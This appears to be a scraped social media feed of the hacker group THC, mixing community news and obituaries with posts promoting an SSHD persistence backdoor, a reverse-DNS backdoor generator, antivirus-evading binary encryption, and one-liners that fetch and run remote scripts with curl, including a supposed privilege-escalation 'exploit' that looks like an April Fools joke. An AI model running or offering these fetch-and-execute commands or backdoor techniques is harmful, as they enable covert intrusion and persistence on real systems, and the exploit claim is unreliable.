The oldest and still active security research group - The Hacker's Choice. (Founded 1995) This is a group account, so different people post! :)
@lp0_on_fire It will work fine without systemctl. Any way to restart the sshd will work, either by waiting for a reboot or sending a SIGTERM.
@agowa338 Can't see how rhost is better. rhosts-trick requires the attacker to drop at least 2 new files to the target and change at least 1 line in the sshd_config (HostbasedAuthentication; a line that raises a red flag).
Our trick adds no new file to the system and only needs 1 line to the config (without raising a red flag).
Please explain if I got this wrong.
Can anyone test my *SMALLEST* SSHD backdoor?
- Survives updates.
- Does not use ~/.ssh/authorized_keys or PAM modules.
- Does not create any new file.
Just SSHD trickery.
Source at https://thc.org/tips
Stealth died 😢 A member of Team-Teso, Phrack staff, and many other groups. A true hacker—perhaps as true as a hacker can ever be. WE MISS YOU. 🩷
More: https://thc.org/404
<stealth> we had joy we had fun we had a rootshell on a sun.
Ebury Version 1.8.2.e6
Memory dump from live processes now available (sshd and systemd-udev). De-crypted and De-obfuscated. Enjoy.
{eval,"$({curl,-SsfL,https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh})"}
### hackshell now detects Ebury ###
Ebury SSHD backdoor?? on 400,000 hosts?
Let's fuck around and find out. (Why +s on the .so file???)
Dissect, understand & ridicule. Join the group effort at https://thc.org/ops or SSH straight into the server and check ~/ebury:
ssh -o "SetEnv SECRET=lYQkdQHIuQyTJngVtIskqRLx" root@adm.segfault.net (password is 'segfault')
INTERVIEW of "MB" WhereWarlocksStayUpLate:
https://wherewarlocksstayuplate.com/interview/mohammed-bagha/
You have inspired many. We are fans:⚡️🌊🎠
🇩🇪 German speaking only: THC member and @phrack staff on @heiseonline about Phrack's 40th, hacking and life in general.
Inject LUA scripts into a running Linux Process like a boss, by stealth/team-teso:
Friend of ours is testing his PoC to DISABLE XMR mining pools.
Revenge for all those pesty XMR miners installed by script kiddies. Tool destroys the ENTIRE wallet: stopping all xmr-rig miners worldwide (of the same wallet).
Looking for more WALLETs: https://wallet.hellknight.xyz/walletinfo1.php
Please help and save a baby seal.
PHONY AWARD ceremony at the PHRACK PARTY at @why2025camp hosted by @Emerson @thc and tmp.out
VOTE (by shouting) for the “Biggest Security Facepalm” and more. Legends like Hegseth and Crowdstrike have been nominated and informed.
Winning prize is the privilege to be trolled by us and pay for phrack's next print release :>
PHRACK is coming to #DEFCON! We're printing ~10,000 zines and giving an hour-long talk you won't want to miss! Stay tuned. 🔥 #40yrsOfPhrack #phrack72
Dear UNC5174/China, you have violated THC's Terms & Conditions ("to be used for good purpose and academic research only").
May want to discuss this with your therapist. 🤷♂️
Generate your own python-implant of a reverse DNS backdoor. https://thc.org/tips => 6.vi Smallest reverse DNS-tunnel Backdoor.
🐣 CRACKME RESULTS are OUT! 💥
Congrats to rt_saber for being so quick.
Kudos to all those who hammered CloudFlare hard.
https://github.com/phrackzine/crackme/blob/main/easter-2025/teaser-challenge-solution.md
new FEATURE in bincrypter. LOCK & ENCRYPT a binary to a target host. Will execute differently when uploaded to http://virustotal.com or any other but the target host.
Please don't set BC_LOCK="rm -rf ~/" 🙈
i heard John Young of https://cryptome.org/ passed away last week. #Cryptome #RIP
John was an uncompromising role model, publishing all the samizdats he could get his hands on. he even demanded to be included as a defendant together with julian assange.
one of the greatest unsung heroes of the past 30 years.
shit. i hope this is not true.
RIP John.
🍿THC member on camera. A first. 😅
30 years of hacking - a perspective and a reflection. 📺 👉 Keep Hacking 👈 The next 30 years of hacking start today. ❤️
💥CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit (1-liner):
“. <(curl -SsfL https://thc.org/7350pipe)”